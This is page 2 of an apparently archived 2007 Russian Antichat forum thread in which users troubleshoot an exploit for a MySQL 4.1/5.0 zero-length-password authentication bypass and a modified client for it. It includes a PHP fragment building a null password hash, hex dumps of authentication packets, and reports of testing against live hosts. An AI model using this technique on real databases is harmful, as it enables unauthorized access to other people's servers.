ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование_OLD > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.08.2007, 16:00
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Цитата:
дело в том что через стандартные mysql клиенты я не могу заместо паса нулевое значение подставить... а через сокет как в скрипте - я не знаю как сделать..
Дык ettee выложил уже модифицированный клиент MySQL, посмотри чуть выше сплоита!
 

  #12  
Старый 15.08.2007, 16:26
j0ze
Новичок
Регистрация: 06.10.2006
Сообщений: 11
Провел на форуме:
22670

Репутация: 5
По умолчанию
только он не пашет почемуто.. затестил на двух хостах с mysql версии 4.1.20

сам эксп дает добро "Received OK reply, authentication successful!!" а если через модифицированый клиент то

C:\>mysql.exe -uroot -ptrash
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: Y
ES)

и вообще странно.. если тестить через скрипт отснифаный пакет авторизации такой

Код:
0x0000   3A 00 00 01 85 A2 00 00-00 00 00 01 08 00 00 00   :...…¢..........
0x0010   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0x0020   00 00 00 00 72 6F 6F 74-00 14 00 00 00 00 00 00   ....root........
0x0030   00 00 00 00 00 00 00 00-00 00 00 00 00 00         ..............
т.е в конце одни нулевые байты. так и должно быть т.к это все нулёный хеш

"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\ x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"; # continue NULL hash

а когда логаешься через этот модифицированый клиент вот что получается

Код:
0x0000   3A 00 00 01 85 A6 03 00-00 00 00 01 08 00 00 00   :...…¦..........
0x0010   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0x0020   00 00 00 00 72 6F 6F 74-00 14 00 00 00 00 00 00   ....root........
0x0030   80 0F A2 00 9C FD 12 00-38 24 44 00 AC FD         ?.¢.œý..8$D.¬ý
у кого-нибудь вообще получалось этим клиентом порутать mysql?
Последний раз редактировалось j0ze; 15.08.2007 в 16:30..
 

  #13  
Старый 15.08.2007, 16:52
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Получалось.
 

  #14  
Старый 15.08.2007, 17:51
j0ze
Новичок
Регистрация: 06.10.2006
Сообщений: 11
Провел на форуме:
22670

Репутация: 5
По умолчанию
в этом клиенте чето не так.. потому что в случае правильной авторизации mysql отвечает это

Код:
0x0000   01 00 00 02 FE                                    ....þ
и от тестового скрипта ответ такойже.. тобишь положительный. это значит что все 2 хоста на которых я тестил эксп уязвимы а этот модифированый клиент не пашет....

скорей всего проблема в том что

0x0030 80 0F A2 00 9C FD 12 00-38 24 44 00 AC FD ------- нада заменить на
0x0030 00 00 00 00 00 00 00 00-00 00 00 00 00 00

тока вот как это сделать хз.. есть спецы по этой части?
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ